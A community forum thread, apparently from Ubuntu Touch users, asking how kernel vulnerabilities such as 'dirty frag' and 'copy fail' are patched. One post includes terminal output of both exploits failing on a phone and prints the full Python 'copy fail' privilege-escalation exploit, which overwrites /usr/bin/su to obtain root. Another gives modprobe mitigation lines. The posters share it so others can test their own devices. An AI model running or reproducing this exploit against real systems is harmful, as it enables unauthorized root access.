UT kernel security question

tidip

Hello,

hopefully I am in the right section... I am just wondering how are kernel security issues handled in UT. Let's take as an example the 2 last ones (dirty frag and copy fail). Is it the responsibility of the maintainer(s) of the device to push a new kernel or some other group? How do I get such updates?

Thanks

Bolly

@tidip If I'm not mistaken, it's not possible to exploit those vulnerabilities on Ubuntu Touch since there's only one user.

gpatel-fr

@tidip

it all depends on the kernel, that is, on the specific port.

Here is what give the 2 exploits you are referencing to on my Fairphone 5 running UT 24.04-1.3

phablet@ubuntu-phablet:~$ python3 copyfail.py
Traceback (most recent call last):
  File "/home/phablet/copyfail.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ^^^^^^^^^^^^^^^
  File "/home/phablet/copyfail.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
      ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
phablet@ubuntu-phablet:~$ cd Downloads/
phablet@ubuntu-phablet:~/Downloads$ gcc -O0 -Wall -o exp exp.c -lutil
phablet@ubuntu-phablet:~/Downloads$ ./exp
/usr/bin/su: 1: ELF: not found
/usr/bin/su: 1: cannot open : No such file
/usr/bin/su: 1: cannot open {�(��4[O+1� �z�~��]�5��m���l<����������E]�����E- ���Hp�: No such file
/usr/bin/su: 4: F�1� ���*F�B1� ���.F�b1� ���2F��1� ���6F��1� ���:F��1� ���>F��1� ���BF�2� ���FF�2�: not found
/usr/bin/su: 5: Syntax error: ")" unexpected
phablet@ubuntu-phablet:~/Downloads$ 

in short, no root shell, so not vulnerable without any mitigation. Don't ask me why, I don't know.

To anyone wanting to run this code: the dirtyfrag exploit can be had here

The python code to test the copyfail vuln is here:

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4

@bolly: getting root access from a software running as phablet allows the code to install system services, remount the root r/w and as such is preferrably avoided.

idonthatevests

@gpatel-fr
the second one looks like it successfully wrote something to su and tried to run it, but the su contents was misunderstood by OS
The mitigation should be the same as for desktop Linux: disabling affected modules completely in modprobe config:

install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
install algif_aead /bin/false

tidip

Thanks for your answers. I was just taking these 2 flaws as examples to understand the workflow in such cases. Still interesting to know that these 2 are not affecting us too much.

So if I correctly understood patching the kernel would be responsibility of the port maintainer(s).

gpatel-fr

@idonthatevests said:

but the su contents was misunderstood by OS

Well, this misunderstanding would need explaining but it could be the result of a security layer somewhere. I tested these 2 exploits on my workstation under Kunbutu 24.04 and they produced the expected result (root access).

gpatel-fr

@tidip said:

Still interesting to know that these 2 are not affecting us too much.

This is not what I wrote. You could replace 'are' by 'may'. It depends on the specific device. I provided the means of testing these exploits to allow people to test themselves.